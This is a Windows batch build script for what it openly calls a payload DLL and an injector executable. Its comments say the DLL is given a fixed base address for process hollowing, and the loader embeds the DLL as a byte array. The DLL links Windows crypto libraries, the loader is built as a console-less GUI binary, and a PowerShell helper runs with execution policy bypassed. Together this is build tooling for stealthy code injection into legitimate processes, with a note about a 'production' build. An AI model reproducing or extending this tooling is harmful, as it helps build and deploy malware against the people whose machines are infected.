@echo off
REM build.bat - compiles ckdll.dll (payload) and loader.exe (injector)
REM Requires: MSVC (Visual Studio 2022 Build Tools C++ with vcvars64.bat)
REM
REM Output:
REM   bin\ckdll.dll  - payload DLL (~20 KB, CRT-less)
REM   src\payload.h  - byte array of the DLL (auto-generated by gen.ps1)
REM   bin\loader.exe - injector (~163 KB, static CRT)

call "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat" >nul 2>&1

if not exist bin mkdir bin

REM --- payload DLL (CRT-less, no optimization) ---
REM /Od /Oi-: no optimization, no intrinsics (SSE vectorized memcpy crashes in hollowed process)
REM /NODEFAULTLIB /ENTRY:payload_entry: no CRT runtime
REM /DYNAMICBASE:NO /BASE:0x5F000000: fixed base for process hollowing
REM /DDEBUG: enable debug logging (remove for production build)
cl /nologo /LD /Od /Oi- /GS- /Gs1048576 /DDEBUG src\ckdll.cpp /Fe:bin\ckdll.dll ^
   /link /NODEFAULTLIB /ENTRY:payload_entry /DYNAMICBASE:NO /BASE:0x5F000000 ^
         /GUARD:NO /MACHINE:X64 kernel32.lib crypt32.lib bcrypt.lib
if errorlevel 1 (echo DLL BUILD FAILED & exit /b 1)

REM --- generate payload.h (byte array of the DLL embedded in loader.exe) ---
powershell -nop -exec bypass -file src\gen.ps1

REM --- loader (injector, static CRT, GUI subsystem) ---
cl /nologo /O2 /MT src\loader.cpp /Fe:bin\loader.exe /link /SUBSYSTEM:WINDOWS user32.lib
if errorlevel 1 (echo LOADER BUILD FAILED & exit /b 1)

echo ALL OK
